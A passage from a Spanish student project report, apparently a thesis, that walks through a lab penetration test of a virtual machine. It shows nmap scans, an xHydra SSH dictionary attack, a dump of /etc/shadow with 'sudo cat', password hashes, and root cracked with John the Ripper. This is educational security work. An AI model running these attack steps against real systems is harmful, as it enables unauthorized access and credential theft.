RSET
NOOP
QUIT
HELP
VRFY
2.0.0
EXPN
VERB
ETRN
DSN
AUTH
2.0.0
STARTTLS
2.0.0
http://www.sendmail.org/email-addresses.html
Pgina 84
open
http
pop3
Openwall popa3d
143/tcp open
imap
UW Imapd 2004.357
8 12:51:41 2009)
open
ssh
25/tcp
open
smtp
Sendmail 8.13.7/8.13.7
80/tcp
open
http
110/tcp open
pop3
Openwall popa3d
143/tcp open
imap
UW Imapd 2004.357
Pgina 85
Anotamos esto ltimo para posterior consulta. Estos datos nos sern importantes, ya que sern
posibles entradas al sistema. Adems, nos est mostrando el sistema operativo que est instalada la
mquina.
Otro escaneo interesante, puede ser con las opciones -P0 (para evitar que haga ping antes de cada
escaneo de puerto, ya que muchos sistemas tienen desactivado la respuesta a pings), -sS para que
haga el escaneo con SYN en vez de ACK:
bt ~ # nmap -P0 -sS -p 21,22,23,80,110,443,3306 192.168.1.100
Starting Nmap 4.60 ( http://nmap.org ) at 2009-04-08 14:09 CEST
Interesting ports on 192.168.1.100:
PORT
STATE
SERVICE
21/tcp
open
ftp
22/tcp
open
ssh
23/tcp
filtered telnet
80/tcp
open
http
110/tcp
open
pop3
443/tcp
closed
https
Recapitulamos lo que hemos encontrado con los distintos escaneos de puertos, y que nos puede
resultar interesante:
Host 192.168.1.100 appears to be up.
MAC Address: 00:0C:29:A2:DA:9C (VMware)
21/tcp open
IPv4 socket)
ftp
22/tcp
open
ssh
25/tcp
open
smtp
Sendmail 8.13.7/8.13.7
Pgina 86
80/tcp
open
http
110/tcp open
pop3
Openwall popa3d
143/tcp open
imap
UW Imapd 2004.357
Pgina 88
Tambin est activo. Ya hemos probado todos los servicios que nos ha proporcionado NMAP, y
comprobado que efectivamente, son todos correctos, dando as por concluida, la seccin de NMAP.
Recoleccin de informacin
De entre todos los servicios encontrados en el sistema, el mas interesante parece que es el SSH.
Esto es as por dos razones: la primera, es que dado que intentamos simular una auditora, por lo
que no deberamos llevar a cabo acciones que pudieran poner en peligro el sistema (por ejemplo,
buffer overflows, denegaciones de servicio etc), y una buena forma de respetar esto, es mediante el
uso de ataques de diccionario (se explicar ms adelante). La segunda razn es, que ya que vamos a
realizar un ataque de diccionario, lo ideal es explotar un servicio que directamente nos devuelva una
shell. Indagando por la web que nos ofreca el CEO, :
Vemos los distintos mails, que suelen coincidir con los nombres de usuario (o al menos, tenemos los
nombres de los componentes de la empresa, para empezar a indagar como ser su nombre de
usuario). Adems, nos fijamos en los SySAdmin que sern objetivos muy interesante (ya que son
administradores, y probablemente tengan acceso por ssh al sistema, que es lo que nos interesa).
Por lo tanto, tenemos 3 nombres:
SysAdmin: Adams Adams - adamsa@noseguridad.corp
SySAdmin: Bob Banter - banterb@noseguridad.corp
SysAdmin: Chad Coffee - coffeec@noseguridad.corp
Ataques de diccionario
Para comprender un ataque de diccionario, primero deberamos entender que es un ataque de fuerza
bruta. Un ataque de este tipo, es ir probando combinaciones de letras de tal forma, que acertemos
con el login y password de un usuario y podamos acceder al sistema. ste mtodo, no es muy
rpido, por lo que deberamos de refinarlo. Aqu es donde entra en juego el ataque de diccionario.
Reduciremos los intentos de contrasea mediante el uso de palabras conocidas como passwords
comunes, nombres de actores, nombres bblicos etc... de tal forma que eliminemos palabras
absurdas.
Para realizar un ataque de diccionario, necesitaremos 2 elementos: logins y passwords. Pasemos
primero, a ver como conseguir los nombres de usuario.
Pgina 89
Figura 25:
Nombres de usuario
Vemos los distintos mails(Figura 25: ), que suelen coincidir con los nombres de usuario (o al
menos, tenemos los nombres de los componentes de la empresa, para empezar a indagar como ser
su nombre de usuario). Adems, nos fijamos en los SySAdmin que sern objetivos muy
interesante (ya que son administradores, y probablemente tengan acceso por ssh al sistema, que es
lo que nos interesa).
Por lo tanto, tenemos 3 nombres:
SysAdmin: Adams Adams - adamsa@noseguridad.corp
SySAdmin: Bob Banter - banterb@noseguridad.corp
SysAdmin: Chad Coffee - coffeec@noseguridad.corp
Vamos a crear un diccionario de nombres de usuario, donde aparezcan distintas combinaciones con
los nombres para generar los nombres de usuario (adems de los emails que ya tenemos). Asi,
podemos por ejemplo hacer:
adamsa
adamadam
aadam
adams
banterb
bbanter
bobb
robertb
rbanter
bob
robert
coffeec
chadcoffee
ccoffee
Cuantos mas se nos ocurran, mas probabilidades tendremos de encontrar el nombre de usuario
correcto. Por ahora, probaremos con estos. Lo guardamos en un fichero de texto, por ejemplo
usuarios.txt
Diccionarios
A continuacin, vamos a presentar una herramienta grfica, que se utiliza para el ataque online por
diccionarios: xHydra. Este programa, viene por defecto en backtrack, y para iniciarlo, le damos al
botn de kde y seguimos el siguiente dibujo(Figura 26: ):
Pgina 90
Figura 26:
Las herramientas que Backtrack ofrece para seguridad, estn organizadas siguiendo una jerarqua.
Nosotros buscamos un programa que nos ofrezca escalada de privilegios (pretendemos obtener los
privilegios de algn administrador de la empresa), que sea de ataque de diccionario (para eso hemos
creado el diccionario de usuarios y contraseas), y por ltimo, es online: vamos a trabajar
intentando conectarnos al servidor SSH. El Hydra podemos ejecutarlo en modo grfico y en modo
consola. Nosotros, vamos a ejecutarlo en modo grfico.
Figura 27:
Pgina 91
Figura 28:
Aqu elegimos en username list el diccionario de usuarios que hemos creado. En password list,
elegimos el diccionario de passwords comunes que hemos sacado de internet. Por ltimo, vamos a
marcar las casillas Try login as passwords para que de el mismo nombre que contrasea, y Try
empty password por si no tuviera password. En la pestaa tunig(Figura 29: ):
Figura 29:
Pgina 92
Aqu, el number of tasks, ser el nmero de procesos en paralelo que intentarn hacer logins a la
vez. Dado que nuestro diccionario es bastante grande, deberamos mantener pequeo este nmero
(se han encontrado muchos problemas en este paso, por lo que finalmente se ha reducido a 2). El
timeout es el tiempo que pasar entre intento e intento. Seleccionaremos Exit after first found pair
para que en cuanto encuentre algn password, termine. Ya podemos iniciar el ataque. Tras un rato
de espera, obtenemos(Figura 30: ):
Figura 30:
Aqu hemos obtenido un login y password: bbanter, bbanter. Debemos recordar que hemos obtenido
esto gracias a haber seleccionado el try login as password. Para ejecutar el comando desde
consola, aparece en la parte inferior de la ventana. Ya tenemos un punto de entrada al sistema.
Vamos a comprobar que efectivamente podemos entrar:
bt ~ # ssh bbanter@192.168.1.100
bbanter@192.168.1.100's password:
Linux 2.6.16.
bbanter@slax:~$ whoami
bbanter
bbanter@slax:~$
xHydra nos ha ofrecido unos resultados deseables. Parece que no es demasiado complicado de
utilizar, aunque quizs las opciones de tunning sean poco intuitivas desde el punto de vista de un
novato. Por otro lado, tambin tuvimos problemas con que se quedaba colgado en ocasiones
(supondremos que ser por utilizar entornos virtualizados). Otro punto en su contra, es su propia
naturaleza de ataque de diccionario. Siempre ser poco eficiente, y si un sistema est protegido
con contraseas ms complicadas, o limita el nmero de intentos a la hora de loguearse, xHydra tal
y como lo venimos utilizando fracasar. A su favor, debemos decir que ha obtenido finalmente el
Pgina 93
Pgina 94
Escalada de privilegios
Una vez tenemos varios nombres de usuarios y contraseas, algo interesante para probar, es si la
contrasea de root usa la misma contrasea o nombre de usuario que los usuarios que tenemos.
Debemos recordar, que segn la web de la empresa, son administradores, por lo que es posible, que
usaran sus contraseas para ser root(algo muy desaconsejable, pero que se da en muchas empresas
con polticas de contraseas muy pobres).
aadams@slax:~$ su
Password: nostradamus
Sorry.
aadams@slax:~$ su
Password: aadams
Sorry.
aadams@slax:~$ su
Password: bbanter
Sorry.
aadams@slax:~$ su
Password: ccoffee
Sorry.
Nota: se ha puesto los passwords en visible para poder mostrar lo que se ha intentado.
Como vemos, las contraseas de los administradores no coinciden con la del root, por lo que
tendremos que idear otra forma de hacernos con la contrasea.
Descifrando Shadow
No todos los usuarios tienen permisos para poder acceder en modo lectura a este archivo, por lo que
vamos a probar si alguno de los usuarios que tenemos (recordemos que ambos son administradores,
por lo que tiene sentido) tiene permisos. Probaremos con aadams:
aadams@slax:~$ sudo cat /etc/shadow
Pgina 95
Hemos ejecutado la instruccin sudo para poder acceder al archivo con los mximos privilegios
posibles. En este caso, la contrasea coincida con nostradamus.
Password: nostradamus
root:$1$r72/qKLG$TqTzMBf/6ErN9Z9.J9GiF/:14230:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::
aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::
bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::
ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::
Hemos tenido suerte: aadams tena permisos parap poder leerlo. Es hora de descargarnos el
contenido a local, para poder usar herramientas de descifrado.
Creamos en nuestra Backtrack un archivo de texto donde pegamos ese texto. Lo llamaremos
shadowSISTEMA.txt.
A continuacin vamos a presentar una herramienta de ataque de diccionario tambin (esta vez algo
ms potente), pero que trabaja en offline:
Se trata de John the ripper (Jack el destripador). Es un programa de criptografa que permite
descifrar contraseas de varios sistemas operativos. Se suele utilizar por administradores de
sistemas para comprobar la robustez de los passwords de sus usuarios. Es una herramienta open
source, y tiene versiones para muchas plataformas. Es capaz de autodetectar el mtodo de cifrado
utilizado para cifrar las contraseas.
Pgina 96
Su forma de funcionar, es mediante fuerza bruta (en su versin mas bsica), la cual se puede
modificar para que pruebe, por ejemplo, solamente contraseas con caracteres (sin smbolos ni
nmeros), para que utilice diccionarios etc... Una vez elegido el mtodo con el que va a hacer
pruebas, john the ripper prueba cada contrasea cifrandola con el mismo mtodo con el que sea ha
cifrado la contrasea, y comprobando a ver si coincide, en cuyo caso, devuelve la contrasea.
Para nuestro caso, lo que se hizo fue utilizar varios diccionarios desde Backtrack, sin ningn
resultado rpido, por lo que se opt por pasar el shadow obtenido anteriormente a la mquina local
(Ubuntu), y cerrando las mquinas virtuales para tener mayor potencia de clculo.
A continuacin presentamos el comando utilizado y los resultados:
alberaan@Smaug:~$ john --user=root -wordfile:diccionario.txt
shadowSISTEMA.txt
Loaded 1 password (FreeBSD MD5 [32/64])
anthropogenic
(root)
c/s: 5273
trying:
Con el parmetro user, indicamos que solamente queremos que descifre el usuario root. Con
-wordfile:diccionario.txt le indicamos que diccionario utilizar. Finalmente, introducimos el archivo
donde est copiado /etc/shadow del sistema a atacar (una copia que tenemos en local).
El resultado fue, que encontr que la contrasea de root es anthropogenic. Lo comprobamos desde
el sistema vctima:
aadams@slax:~$ su
Password: anthropogenic
root@slax:/home/aadams#
Y efectivamente, es la contrasea, y estamos dentro del sistema como root.
Valoraciones finales
Valoracin primer taller
Hemos aprendido bastante sobre redes en entornos virtuales, y descubierto como utilizar muchos
servicios bsicos sobre Backtrack. El uso de la herramienta de netcat, una herramienta que fue muy
popular en su da, ha sido algo bastante interesante de aprender a utilizar, por las mltiples opciones
que ofrece. Quizs se echara en falta el poder ver ms herramientas de forma ms generalista, pero
el poder ahondar en una herramienta, de forma tan tcnica, es algo que nunca haba hecho.
A pesar de haber realizado ataques sencillos, se ha aprendido mucho, ya que ha sido un primer
contacto hacia aspectos tcnicos de una auditora de seguridad informtica.
Pgina 98
Pgina 99
Conclusiones y cierre
Tras haber finalizado el proyecto, hay muchas ideas y conceptos sobre los que me gustara ahondar.
La seguridad, parece un campo infinito, donde cada problema que se encuentra, tiene un efecto de
bola de nieve: intentando realizar algo, se encuentra un problema mayor, y otro, y otro y as
sucesivamente. Nunca se puede saber y realizar todo lo que uno quiere, y la seguridad informtica
es un claro ejemplo, donde adems, siempre interviene otra parte (ya sea atacante o defensora).
Siempre habr alguien ms listo y que sabr ms, y cada da, encontraremos nuevas herramientas
que vulneran nuevos fallos. Aparecern nuevas tcnicas, que con el avance de la tecnologa, harn a
los sistemas ms vulnerables.
An as, es nuestra tarea como profesionales, el intentar minimizar los riesgos, y tratar de hacer las
cosas lo mejor posible. Y personalmente, creo, que uno de los puntos que hay que ahondar ms, es
el concienciar a las personas para que, en caso de emergencia puedan actuar como deben.
Como vemos a lo largo del proyecto, se han abordado muchsimos campos, algunos ms
profundamente que otros. Posiblemente, el proyecto, hubiera tomado un matiz ms tcnico si se
hubiera abordado uno o dos campos, pero como ingenieros, debemos de conocer (al menos con un
mnimo grado de detalle) todos los campos expuestos.
Por ltimo, me gustara aadir, el hecho de que, tras haber sido vctima de un hacker en mis
propios ordenadores personales, poder comentar el hecho de que, no todo se puede solucionar
aplicando soluciones tcnicas sino que, todos esos consejos que cada experto en seguridad aconseja,
todas las medidas de contencin que aparecen en la web y manuales, efectivamente, son tiles, y
han conseguido que, pueda salir airoso del problema. Quizs antes no es que tomara muy en serio
estos consejos, pero si que apreciaba ms la utilidad de la parte tcnica. Ahora, visto lo visto, y tras
haber recorrido todo el camino de la elaboracin del proyecto, me doy cuenta de que muchas veces,
no son solamente los medios informticos son utilizados para el robo de informacin, y dar solucin
a los problemas de seguridad de los mismos, sino que, gracias a lo aprendido, y la rpida y correcta
actuacin de los usuarios, podemos solventar la mayora de los problemas.
Pgina 100
Bibliografa
[1] Laboratorios Dragonjar http://labs.dragonjar.org/
[2] Web oficial NMAP http://nmap.org/
[3] Web oficial Netcat http://netcat.sourceforge.net/
[4] Blog Seguridad Security By Default http://www.securitybydefault.com/
[5] Blog Seguridad Pentester http://www.pentester.es/
[5] Diccionarios http://www.outpost9.com/files/WordLists.html
[6] Web oficial John The Ripper http://www.openwall.com/john/
[7] Web oficial Hydra http://www.xhydra.com/
[8] Web oficial Bactrak http://www.remote-exploit.org/backtrack.html
[9] OSSTMM 2.2 de ISECOM
[10] Syngress Penetration Testers Open Source Toolkit Volume 2
[11] Wikipedia http://wikipedia.org/
[12] Como funciona un exploit http://www.mipistus.blogspot.com/2008/04/ejemplo-de-cmofunciona-un-exploit.html
[13]Fallo dns http://unixwiz.net/techtips/iguide-kaminsky-dns-vuln.html
[14]Firewalking http://www.scribd.com/doc/3254504/Firewalking
[15]PBX http://www.callcentermagazine.com/article/CTM20020404S0012
[16] Voicemail http://www.net-security.org/article.php?id=43
[17] Voivemail http://www.hispahack.com/oldweb/mi002.htm
[18] Voicemail http://www.securitybydefault.com/search?q=buz%C3%B3n+de+voz
[19] Fax http://www.governmentsecurity.org/hacking_multifunction_printers
[20] Bluetooth tools de SIl Janssens
[21] Cmaras vigilancia http://www.gnucitizen.org/blog/hacking-video-surveillance-networks/
[22] Syngress Metasploit Toolkit
[23] Syngress Nessus Network Auditing second edition
Pgina 101